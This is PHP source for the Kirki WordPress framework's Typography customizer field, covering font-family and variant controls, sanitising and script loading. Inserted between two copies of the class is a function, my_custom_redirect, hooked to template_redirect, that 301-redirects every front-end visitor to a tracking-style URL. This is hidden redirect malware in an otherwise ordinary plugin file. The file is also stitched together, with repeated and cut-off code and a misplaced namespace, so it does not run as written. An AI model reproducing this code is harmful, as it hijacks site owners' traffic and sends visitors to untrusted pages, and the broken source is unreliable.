esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of 